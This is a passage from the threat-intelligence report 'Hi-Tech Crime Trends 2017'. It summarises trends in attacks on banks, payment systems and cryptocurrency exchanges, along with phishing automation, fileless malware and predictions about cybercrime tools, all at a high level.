- One of the possible sabotage scenarios may be trading on exchanges on behalf of the victim bank in order to influence exchange rates and cause losses. This can lead to snowballing style flash crashes as HFT trading algorithms respond to fluctuations in exchange rates.
- Out of 22 new malicious programs used to steal funds, 20 (91%) were created and are controlled by Russian-speaking hackers.
- Phishing for banks and payment systems is automated and conducted in real time, which allows cybercriminals to bypass SMS confirmations for debiting money. On average, 10-15% of visitors of financial phishing websites enter their data.
- The total damage caused by targeted hacker attacks on the crypto-currency industry amounts to more than $168 million, and the income from attacks on cryptocurrency exchanges varies from $1.5 million (Bitcurex) to $72 million (Bitfinex). While a successful attack on a bank brings criminals only about $1.5 million on average.
- Attacks on cryptocurrency exchanges are conducted in the same way as targeted attacks on banks with similar or sometimes identical tools and tactics. E.g. cybercriminals use fake ID to get victim’s SIM-card to recover passwords and gain control over accounts in cryptocurrency services
- The fact attackers are “retargeting” popular banking Trojans such as TrickBot, Vawtrak, Qadars, Tinba, Marcher to collect logins and passwords of cryptocurrency users suggests that they have found a new niche and might focus outside of the traditional banking sector in the nearest future.
- Targeted attacks on cryptocurrency exchanges will be carried out not only by financially motivated hackers but by state-sponsored attackers as well.
BlackEnergy group continues to attack financial and energy companies. The group uses new tools that allow Remote terminal units (RTUs) responsible for the physical opening/closing of power grids to be remotely controlled. Test attacks on power generating companies in the UK and Ireland were tracked in the summer of 2017.
HI-TECH CRIME MARKET ASSESSMENT
The growth in the number of attacks and the totals stolen is a significant indicator of hackers’ capabilities, which drive changes in their tactics and targets. The majority of attackers follow the money, and if they find more efficient and safer ways to earn it, they start investing in them, creating new tools, services, and attack schemes.
In Russia, the amount of losses caused by theft from legal entities is still in decline, but the loss caused by Android banking Trojans is still on the increase. The number of targeted attacks on banks and payment systems is on the rise, but hackers have earned the majority of their profits outside Russia, as we predicted last year.
After phishing attacks on bank clients and payment systems were fully automated, the amount of loss from their activity in Russia became very significant. Every day they attack many more users than banking Trojans, but the net amount of loss is still smaller. However, due to the simplicity of this scheme, an increasing number of criminals are starting to use it.
DEVELOPMENT OF HACKING TOOLS
- Fileless malware using malicious scripts to launch an attack is a new and currently the primary attack method. To slip under the radar, hackers use fileless software that exists only in RAM until the system is rebooted. That said, malicious PowerShell, VBS, PHP scripts help them to ensure persistence in the system and automate some stages of their attacks.
- NotPetya has demonstrated that creating a template can be enough to gain control over a corporate network. In the future, we should expect many scripted cyber-attacks as well as ready-made simple tools that can gain control over corporate domains automatically. If such tools are made publicly available or are sold among hackers, this can lead to an avalanche in growth of attacks on the corporate sector. We primarily expect more incidents involving ransomware, theft of confidential information and extortion for non-disclosure, money theft, and incidents of public exposure by non-financially motivated hackers.
- We expect malware developers to be more active in continuing to publish codes of their programs online. In addition, leaks published by The Shadow Brokers and similar organisations will also be immediately used for malware creation and improvement. This will give a powerful boost to the development of the cybercrime industry.
The full version of Hi-Tech Crime Trends 2017